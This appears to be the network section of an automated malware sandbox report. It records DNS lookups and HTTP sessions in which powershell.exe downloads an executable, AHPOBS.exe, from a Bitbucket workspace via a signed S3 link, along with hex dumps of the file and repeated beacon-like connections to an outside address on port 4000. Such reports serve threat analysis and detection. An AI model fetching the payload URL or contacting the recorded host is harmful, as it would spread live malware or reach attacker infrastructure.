Dec 24, 2024 09:02:28.922234058 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.922250032 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.922272921 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.928484917 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.928524971 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.928555965 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.928569078 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.928611040 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.928643942 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.934725046 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.934741974 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.934838057 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.934853077 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.934896946 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.935533047 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.940970898 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.940994978 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.941036940 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.941050053 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.941085100 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.947539091 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.947599888 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.947635889 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.947686911 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.947725058 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.947746038 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.953773022 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.953793049 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.953830957 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.953846931 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.953869104 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.953895092 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.962703943 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.962726116 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.962826014 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.962841034 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.969291925 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.969381094 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.969400883 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.969414949 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.969439983 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.969469070 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.975521088 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.975547075 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.975613117 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.975614071 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.975622892 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.975663900 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.981822968 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.981842995 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.981865883 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.982021093 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.982027054 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.982209921 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.983485937 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.983546972 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.983550072 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.983561993 CET | 443 | 49705 | 3.5.8.193 | 192.168.2.5
Dec 24, 2024 09:02:28.983604908 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:02:28.983884096 CET | 49705 | 443 | 192.168.2.5 | 3.5.8.193
Dec 24, 2024 09:03:09.145598888 CET | 49808 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:03:09.265111923 CET | 4000 | 49808 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:03:09.265239954 CET | 49808 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:03:09.265640974 CET | 49808 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:03:09.385081053 CET | 4000 | 49808 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:03:31.160300016 CET | 4000 | 49808 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:03:31.160360098 CET | 49808 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:03:31.195436001 CET | 49808 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:03:31.224771976 CET | 49859 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:03:31.314924002 CET | 4000 | 49808 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:03:31.344445944 CET | 4000 | 49859 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:03:31.344542027 CET | 49859 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:03:31.346838951 CET | 49859 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:03:31.466253042 CET | 4000 | 49859 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:03:53.238806009 CET | 4000 | 49859 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:03:53.238895893 CET | 49859 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:03:53.299624920 CET | 49859 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:03:53.315331936 CET | 49910 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:03:53.419130087 CET | 4000 | 49859 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:03:53.434828043 CET | 4000 | 49910 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:03:53.434916973 CET | 49910 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:03:53.435333014 CET | 49910 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:03:53.554780960 CET | 4000 | 49910 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:04:15.333718061 CET | 4000 | 49910 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:04:15.333838940 CET | 49910 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:04:15.387428999 CET | 49910 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:04:15.403472900 CET | 49961 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:04:15.507052898 CET | 4000 | 49910 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:04:15.523174047 CET | 4000 | 49961 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:04:15.523320913 CET | 49961 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:04:15.523617983 CET | 49961 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:04:15.643069029 CET | 4000 | 49961 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:04:37.427429914 CET | 4000 | 49961 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:04:37.427786112 CET | 49961 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:04:37.430354118 CET | 49961 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:04:37.446629047 CET | 49982 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:04:37.549870968 CET | 4000 | 49961 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:04:37.566212893 CET | 4000 | 49982 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:04:37.566343069 CET | 49982 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:04:37.566782951 CET | 49982 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:04:37.686255932 CET | 4000 | 49982 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:04:59.458991051 CET | 4000 | 49982 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:04:59.459089041 CET | 49982 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:04:59.475285053 CET | 49982 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:04:59.491374016 CET | 49983 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:04:59.596375942 CET | 4000 | 49982 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:04:59.614228010 CET | 4000 | 49983 | 172.232.216.250 | 192.168.2.5
Dec 24, 2024 09:04:59.614370108 CET | 49983 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:04:59.614749908 CET | 49983 | 4000 | 192.168.2.5 | 172.232.216.250
Dec 24, 2024 09:04:59.734352112 CET | 4000 | 49983 | 172.232.216.250 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 24, 2024 09:02:22.241790056 CET | 58147 | 53 | 192.168.2.5 | 1.1.1.1
Dec 24, 2024 09:02:22.378411055 CET | 53 | 58147 | 1.1.1.1 | 192.168.2.5
Dec 24, 2024 09:02:24.684047937 CET | 58195 | 53 | 192.168.2.5 | 1.1.1.1
Dec 24, 2024 09:02:24.966599941 CET | 53 | 58195 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 24, 2024 09:02:22.241790056 CET | 192.168.2.5 | 1.1.1.1 | 0xfcc8 | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:02:24.684047937 CET | 192.168.2.5 | 1.1.1.1 | 0x8e58 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 24, 2024 09:02:22.378411055 CET | 1.1.1.1 | 192.168.2.5 | 0xfcc8 | No error (0) | bitbucket.org | - | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:02:22.378411055 CET | 1.1.1.1 | 192.168.2.5 | 0xfcc8 | No error (0) | bitbucket.org | - | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:02:22.378411055 CET | 1.1.1.1 | 192.168.2.5 | 0xfcc8 | No error (0) | bitbucket.org | - | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:02:24.966599941 CET | 1.1.1.1 | 192.168.2.5 | 0x8e58 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 24, 2024 09:02:24.966599941 CET | 1.1.1.1 | 192.168.2.5 | 0x8e58 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 24, 2024 09:02:24.966599941 CET | 1.1.1.1 | 192.168.2.5 | 0x8e58 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.8.193 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:02:24.966599941 CET | 1.1.1.1 | 192.168.2.5 | 0x8e58 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 16.182.71.81 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:02:24.966599941 CET | 1.1.1.1 | 192.168.2.5 | 0x8e58 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.12.48 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:02:24.966599941 CET | 1.1.1.1 | 192.168.2.5 | 0x8e58 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 54.231.129.137 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:02:24.966599941 CET | 1.1.1.1 | 192.168.2.5 | 0x8e58 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 52.216.39.17 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:02:24.966599941 CET | 1.1.1.1 | 192.168.2.5 | 0x8e58 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 16.182.100.41 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:02:24.966599941 CET | 1.1.1.1 | 192.168.2.5 | 0x8e58 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.24.172 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 09:02:24.966599941 CET | 1.1.1.1 | 192.168.2.5 | 0x8e58 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.28.247 | A (IP address) | IN (0x0001) | false
• bitbucket.org
• bbuseruploads.s3.amazonaws.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 185.166.143.49 | 443 | 6340 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 08:02:24 UTC | 109 | OUT | GET /mynewworkspace123312/scnd/downloads/AHPOBS.exe HTTP/1.1
                                    Host: bitbucket.org
                                    Connection: Keep-Alive
2024-12-24 08:02:24 UTC | 5918 | IN | HTTP/1.1 302 Found
                                    Date: Tue, 24 Dec 2024 08:02:24 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Content-Length: 0
                                    Server: AtlassianEdge
                                    Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/cf91d8e4-02a0-4397-82bb-bdba0a1c2844/AHPOBS.exe?response-content-disposition=attachment%3B%20filename%3D%22AHPOBS.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZLOXG2B&Signature=SWcM%2FOPeR%2BxliX6J91lSOPwmbQQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJHMEUCICYvR56NrQqFga3kiY1aQut3DfJ%2F3mouCTxMKwxxvlu9AiEAzRhWhoYfwpU93W5Kbmk%2F0oFd8SYZ7SecTeJWwbrr4q8qsAII6f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNT8poD5wcY6mW%2FA9CqEAsyA5lBS36qs0C9g9fabbm0%2BVPJMoKBXvx06v5%2Bhz4MgRV76W4zkdth%2BCfqilJsCo1BEjkNvg0i27Nz7jMqfQuuIPabkIIZ8Jx0JPukqPqdaH2Br%2FJfu%2BbniBu%2FF%2BMDbd6sGF6faz5wxQbZrU9mN6UV2zn6lvu%2BVHhzGTsDSS%2BMrycK8iTHC2yvERkyiZy7JbG%2BP2dGK3Q%2FftHqyyhaseC0Ew4%2FSdXJlfsKXP7vCUL86eSou6pISsSLwuDc%2Byrgz0Stvci9kY%2F7ciYEzd1oCJ0cmOCOC5nDZvo%2FjmidwltfgIvSSK44XdxhPAAdlx4hmiuIgWsQl9%2Biqj8YhkLMQy22TRNHaMKTUqbsGOp0BTHIfIOC4Yhi8ptO9erjj5vxgbcnFwUWN2iNmempfYjp0od53cyJ%2Fs4GEYpDAK6GmYToRGlTJNyLpnp5mWyllHFhlS4MgW [TRUNCATED]
                                    Expires: Tue, 24 Dec 2024 08:02:24 GMT
                                    Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                    X-Used-Mesh: False
                                    Vary: Accept-Language, Origin
                                    Content-Language: en
                                    X-View-Name: bitbucket.apps.downloads.views.download_file
                                    X-Dc-Location: Micros-3
                                    X-Served-By: 744b66c4d28f
                                    X-Version: c9b3998323c0
                                    X-Static-Version: c9b3998323c0
                                    X-Request-Count: 3477
                                    X-Render-Time: 0.05045938491821289
                                    X-B3-Traceid: 83626b3fffaa4d489e906788edef701e
                                    X-B3-Spanid: 0e5bd62b4432d338
                                    X-Frame-Options: SAMEORIGIN
                                    Content-Security-Policy: base-uri 'self'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassian [TRUNCATED]
                                    X-Usage-Quota-Remaining: 999081.663
                                    X-Usage-Request-Cost: 932.90
                                    X-Usage-User-Time: 0.027935
                                    X-Usage-System-Time: 0.000052
                                    X-Usage-Input-Ops: 0
                                    X-Usage-Output-Ops: 0
                                    Age: 0
                                    X-Cache: MISS
                                    X-Content-Type-Options: nosniff
                                    X-Xss-Protection: 1; mode=block
                                    Atl-Traceid: 83626b3fffaa4d489e906788edef701e
                                    Atl-Request-Id: 83626b3f-ffaa-4d48-9e90-6788edef701e
                                    Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                    Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                    Server-Timing: atl-edge;dur=159,atl-edge-internal;dur=3,atl-edge-upstream;dur=158,atl-edge-pop;desc="aws-eu-central-1"
                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 3.5.8.193 | 443 | 6340 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 08:02:26 UTC | 1201 | OUT | GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/cf91d8e4-02a0-4397-82bb-bdba0a1c2844/AHPOBS.exe?response-content-disposition=attachment%3B%20filename%3D%22AHPOBS.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZLOXG2B&Signature=SWcM%2FOPeR%2BxliX6J91lSOPwmbQQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJHMEUCICYvR56NrQqFga3kiY1aQut3DfJ%2F3mouCTxMKwxxvlu9AiEAzRhWhoYfwpU93W5Kbmk%2F0oFd8SYZ7SecTeJWwbrr4q8qsAII6f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNT8poD5wcY6mW%2FA9CqEAsyA5lBS36qs0C9g9fabbm0%2BVPJMoKBXvx06v5%2Bhz4MgRV76W4zkdth%2BCfqilJsCo1BEjkNvg0i27Nz7jMqfQuuIPabkIIZ8Jx0JPukqPqdaH2Br%2FJfu%2BbniBu%2FF%2BMDbd6sGF6faz5wxQbZrU9mN6UV2zn6lvu%2BVHhzGTsDSS%2BMrycK8iTHC2yvERkyiZy7JbG%2BP2dGK3Q%2FftHqyyhaseC0Ew4%2FSdXJlfsKXP7vCUL86eSou6pISsSLwuDc%2Byrgz0Stvci9kY%2F7ciYEzd1oCJ0cmOCOC5nDZvo%2FjmidwltfgIvSSK44XdxhPAAdlx4hmiuIgWsQl9%2Biqj8YhkLMQy22TRNHaMKTUqbsGOp0BTHIfIOC4Yhi8ptO9erjj5vxgbcnFwUWN2iNmempfYjp0od53cyJ%2Fs4GEYpDAK6GmYToRGlTJNyLpnp5mWyllHFhlS4MgWZ%2FiOhFUhQFfPxKT6JeUDOj0QsfykBEnb3FQyIvkEHL [TRUNCATED]
                                    Host: bbuseruploads.s3.amazonaws.com
                                    Connection: Keep-Alive
2024-12-24 08:02:26 UTC | 552 | IN | HTTP/1.1 200 OK
                                    x-amz-id-2: d/p+jzylfJRmN9MWblCPoAu1J87FPz5SdiiJOJzSvscmgtsFZF0lWUolqkFkZNaO7Jz/IYgrmus4qFx6+eAG8g==
                                    x-amz-request-id: GAQ4PR85YEGASFW8
                                    Date: Tue, 24 Dec 2024 08:02:27 GMT
                                    Last-Modified: Sun, 22 Dec 2024 20:40:32 GMT
                                    ETag: "a9c526f3a276012d554ac382a90bca3d"
                                    x-amz-server-side-encryption: AES256
                                    x-amz-version-id: 0781A17dsPoAtEV2mTFX.98ZpLby1B1o
                                    Content-Disposition: attachment; filename="AHPOBS.exe"
                                    Accept-Ranges: bytes
                                    Content-Type: application/x-msdownload
                                    Content-Length: 1136091
                                    Server: AmazonS3
                                    Connection: close
                                    2024-12-24 08:02:26 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c2 1e 94 bf 86 7f fa ec 86 7f fa ec 86 7f fa ec 15 31 62 ec 84 7f fa ec 9d e2 50 ec 29 7f fa ec 9d e2 51 ec b3 7f fa ec 8f 07 79 ec 8f 7f fa ec 8f 07 69 ec a7 7f fa ec 86 7f fb ec 96 7d fa ec 9d e2 4e ec ce 7f fa ec 9d e2 64 ec 9a 7f fa ec 9d e2 60 ec 87 7f fa ec 86 7f 6d ec 87 7f fa ec 9d e2 67 ec 87 7f fa ec 52 69 63 68 86 7f fa ec 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04
                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1bP)Qyi}Nd`mgRichPEL
                                    2024-12-24 08:02:26 UTC472INData Raw: 49 00 9c a6 48 00 a3 a0 35 49 00 c7 05 a4 35 49 00 02 00 00 00 c7 05 ac 35 49 00 8c a6 48 00 c7 05 c4 35 49 00 02 00 00 00 89 0d c8 35 49 00 c7 05 d0 35 49 00 78 a6 48 00 a3 e8 35 49 00 a3 ec 35 49 00 c7 05 f4 35 49 00 60 a6 48 00 a3 0c 36 49 00 c7 05 10 36 49 00 02 00 00 00 c7 05 18 36 49 00 50 a6 48 00 c7 05 30 36 49 00 02 00 00 00 89 0d 34 36 49 00 c7 05 3c 36 49 00 3c a6 48 00 a3 54 36 49 00 c7 05 58 36 49 00 02 00 00 00 c7 05 60 36 49 00 2c a6 48 00 89 0d 78 36 49 00 c7 05 7c 36 49 00 43 00 00 00 c7 05 84 36 49 00 0c a6 48 00 c7 05 9c 36 49 00 02 00 00 00 c7 05 a0 36 49 00 42 00 00 00 c7 05 a8 36 49 00 ec a5 48 00 89 1d b8 36 49 00 89 1d bc 36 49 00 a3 c0 36 49 00 a3 c4 36 49 00 bb f1 75 45 00 89 1d d8 36 49 00 33 db 89 1d dc 36 49 00 89 1d e0 36 49
                                    Data Ascii: IH5I5I5IH5I5I5IxH5I5I5I`H6I6I6IPH06I46I<6I<HT6IX6I`6I,Hx6I|6IC6IH6I6IB6IH6I6I6I6IuE6I36I6I
                                    2024-12-24 08:02:27 UTC16384INData Raw: 36 49 00 c8 a5 48 00 a3 e4 36 49 00 a3 e8 36 49 00 c7 05 f0 36 49 00 a0 a5 48 00 89 0d 08 37 49 00 89 0d 0c 37 49 00 c7 05 14 37 49 00 8c a5 48 00 a3 2c 37 49 00 a3 30 37 49 00 c7 05 38 37 49 00 7c a5 48 00 a3 50 37 49 00 a3 54 37 49 00 c7 05 5c 37 49 00 5c a5 48 00 a3 74 37 49 00 c7 05 78 37 49 00 02 00 00 00 c7 05 80 37 49 00 38 a5 48 00 c7 05 98 37 49 00 02 00 00 00 89 0d 9c 37 49 00 c7 05 a4 37 49 00 18 a5 48 00 a3 bc 37 49 00 c7 05 c0 37 49 00 02 00 00 00 c7 05 c8 37 49 00 f4 a4 48 00 a3 e0 37 49 00 a3 e4 37 49 00 c7 05 ec 37 49 00 d0 a4 48 00 89 0d 04 38 49 00 89 35 08 38 49 00 c7 05 10 38 49 00 b4 a4 48 00 89 1d 20 38 49 00 89 1d 24 38 49 00 a3 28 38 49 00 a3 2c 38 49 00 c7 05 34 38 49 00 8c a4 48 00 bb 3e d5 45 00 89 1d 40 38 49 00 33 db 89 1d 44
                                    Data Ascii: 6IH6I6I6IH7I7I7IH,7I07I87I|HP7IT7I\7I\Ht7Ix7I7I8H7I7I7IH7I7I7IH7I7I7IH8I58I8IH 8I$8I(8I,8I48IH>E@8I3D
                                    2024-12-24 08:02:27 UTC1024INData Raw: 01 39 5d f8 0f 83 8a 00 00 00 eb 02 33 c0 8d 55 e4 52 8b f7 89 45 e4 c7 45 ec 01 00 00 00 89 45 f0 e8 12 2c 00 00 8b 4f 04 8b 47 08 8b 44 81 fc 8b 75 0c 8b 4d 08 53 50 8d 55 f8 52 56 e8 66 19 00 00 85 c0 0f 85 e3 fb 01 00 8b 45 10 ff 00 8b 45 f8 3b c3 74 36 8b 4e 04 8b 14 81 66 83 7a 08 40 0f 85 b0 fb 01 00 8d 48 01 3b cb 0f 84 a5 fb 01 00 8d 75 e4 89 4d f8 e8 eb 00 00 00 39 5d f8 72 8a 33 c0 5e 5b 8b e5 5d c2 0c 00 8d 75 e4 e8 d4 00 00 00 33 c0 5e 5b 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 3b 5d 08 74 1d 56 57 8b 7d 08 8b f3 e8 ac 00 00 00 8b 47 08 89 43 08 83 f8 01 75 0c 8b 17 89 13 5f 5e 8b c3 5d c2 04 00 48 83 f8 0b 77 f2 ff 24 85 08 8f 40 00 dd 07 5f dd 1b 5e 8b c3 5d c2 04 00 6a 10 e8 0c 87 00 00 83 c4 04 85 c0 74 26 8b 7f 0c 8b 17
                                    Data Ascii: 9]3UREEE,OGDuMSPURVfEE;t6Nfz@H;uM9]r3^[]u3^[]U;]tVW}GCu_^]Hw$@_^]jt&
                                    2024-12-24 08:02:27 UTC16384INData Raw: cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 81 ec 4c 01 00 00 53 56 57 8b f9 8b 87 ec 00 00 00 3d 3c 0f 00 00 0f 8d ab 45 02 00 40 89 7c 24 24 89 87 ec 00 00 00 83 f8 01 0f 84 6a 03 00 00 80 bf fc 00 00 00 00 c6 87 44 01 00 00 00 0f 85 5c 01 00 00 8d 9b 00 00 00 00 80 bf 44 01 00 00 00 0f 85 49 01 00 00 80 3d e3 74 49 00 00 75 44 80 3d 68 86 4a 00 00 0f 85 78 45 02 00 8b 35 08 27 48 00 6a 01 6a 00 6a 00 6a 00 8d 44 24 78 50 ff d6 85 c0 0f 85 b0 02 00 00 80 3d e6 74 49 00 01 0f 84 76 45 02 00 83 bf f8 00 00 00 01 0f 84 b1 4e 02 00 83 3d 24 86 4a 00 00 0f 85 79 45 02 00 80 3d ec 74 49 00 01 0f 84 1c 46 02 00 83 bf 60 04 00 00 00 0f 85 29 46 02 00 80 3d 3c 86 4a 00 00 0f 85 6d 47 02 00 